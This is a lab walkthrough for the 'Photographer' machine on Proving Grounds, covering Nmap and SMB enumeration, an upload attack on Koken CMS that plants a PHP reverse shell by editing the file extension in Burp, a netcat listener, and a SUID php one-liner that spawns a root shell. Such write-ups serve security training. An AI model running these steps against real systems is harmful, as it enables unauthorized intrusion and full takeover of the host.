Proving Grounds Play: Photographer Walkthrough.
In this walkthrough, we started by conducting an Nmap scan to identify open ports and services on the target system, which had multiple open ports, including SSH, HTTP, Samba, and others. We decided to focus on enumerating SMB first.
Using the smbclient
tool, we listed the available shares and found some useful information about the workgroup and server. We discovered email addresses and a secret text message during the SMB enumeration phase.
We then moved on to HTTP enumeration and explored the web pages on ports 80 and 8000. On port 8000, we identified that the web server was running the Koken CMS. After searching for exploits related to Koken CMS, we found a relevant exploit on Exploit Database that matched the version of the CMS on port 8000.
Following the exploit, we managed to upload a reverse PHP shell onto the web server. With the help of BurpSuite, we manipulated requests to change the file extension and gained remote access to the system.
After exploring the system, we discovered a PHP installation with SUID binaries. Leveraging GTFOBins, we found a privilege escalation method and used it to escalate our privileges to root.
Let’s start with the first things first, Let do an nmap scan to see what ports are open and what services are running on these ports.
Nmap 7.94 scan initiated Mon Aug 7 08:50:51 2023 as: nmap -A --min-rate 5000 -oN Photographer -Pn -p-
192.168.173.76
Warning: 192.168.173.76
giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.173.76
Host is up (0.15s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA)
| 256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA)
|_ 256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Photographer by v1n1v131r4
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
7370/tcp filtered unknown
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
23761/tcp filtered unknown
24717/tcp filtered unknown
33639/tcp filtered unknown
38792/tcp filtered unknown
48285/tcp filtered unknown
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2023-08-07T12:51:25
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: photographer
| NetBIOS computer name: PHOTOGRAPHER\x00
| Domain name: \x00
| FQDN: photographer
|_ System time: 2023-08-07T08:51:26-04:00
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 7 08:51:34 2023 -- 1 IP address (1 host up) scanned in 42.69 seconds
There are lots of ports open on the box, I will start enumerating SMB first.
smbclient -L ////192.168.173.76//
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP PHOTOGRAPHER
Now, in order to check sambashare file, we will try to log in to SMB server with the following command, when it asks for password, we will hit enter to leave password blank.
After downloading .txt file, we concatenate the file.
We have two e-mail addresses and a probable mail, which includes names Daisa and Agi that can be useful for later enumeration phases, so we will note down these mail addresses and the secret text message.
HTTP Enumeration
We check port 80 browsing the web page, but we find nothing useful.
Now, we will enumerate port 8000 as it is an http server as well.
On port 8000, we encounter a familiar name Daisa that we discovered during SMB enumeration. And we see that web server is built with Koken CMS that is also familiar from nmap -sV scan.
In such a case, we google or searchsploit CMS names and their versions to see if there is an exploit publicly published.
After searchsploiting Koken CMS, we find that there is a public exploit listed on exploit-db 48706.txt, and it is the exact version that we see on port 8000. So, we locate the exploit and read the content to see how to exploit Koken CMS.
So, our shell seems to be uploaded on the web server, but we should catch our import request with BurpSuite to be able to change file extension. We open BurpSuite and turn proxy on and click on Import, and get the request.
And we log in on the page.
As exploit proceed, we will create a php file to have Remote Code Execution (RCE) on the website, but instead of having Remote Code Execution (RCE), we will try to upload a reverse php shell. So, we locate php-reverse-shell already included in our attacking box and copy it to current working directory in order to modify needed lines.
Now, we should change default IP address and Port in php-reverse-shell.
Later on, we should click on import content button located on te dashboard in order to upload our shell.
After clicking on Import content button, we are prompted with a new window to upload our shell.
Now, we will click on up-arrow sign and choose our reverse shell file.
So, our shell seems to be uploaded on the web server, but we should catch our import request with BurpSuite to be able to change file extension. We open BurpSuite and turn proxy on and click on Import, and get the request.
And then change the extension from shell.php.jpg to shell.php and forward the request.
To find the location of the file uploaded, we check the right side of the web page that shows where the shell file is and provides a link to it.
Before visiting the provided link, we should set up a netcat listener to catch our shell on port we specified while editing reverse php file.
Now we got in.
After checking common vulnerabilities or misconfigurations, we find that there is a php installed on the system and has SUID binaries.
find / -perm -u=s -type f 2>/dev/null
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/gdb
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
/usr/bin/xterm
For SUID binaries, we generally check GTFOBins since it provides a plethora of privilege escalation commands for SUID binaries found on the target systems.
And we see that we can escalate our privilege on the machine.
/usr/bin/php -r "pcntl_exec('/bin/bash',['-p']);"
Boom, We are root on the box.
Now submit the flags and stay tuned for next writeup.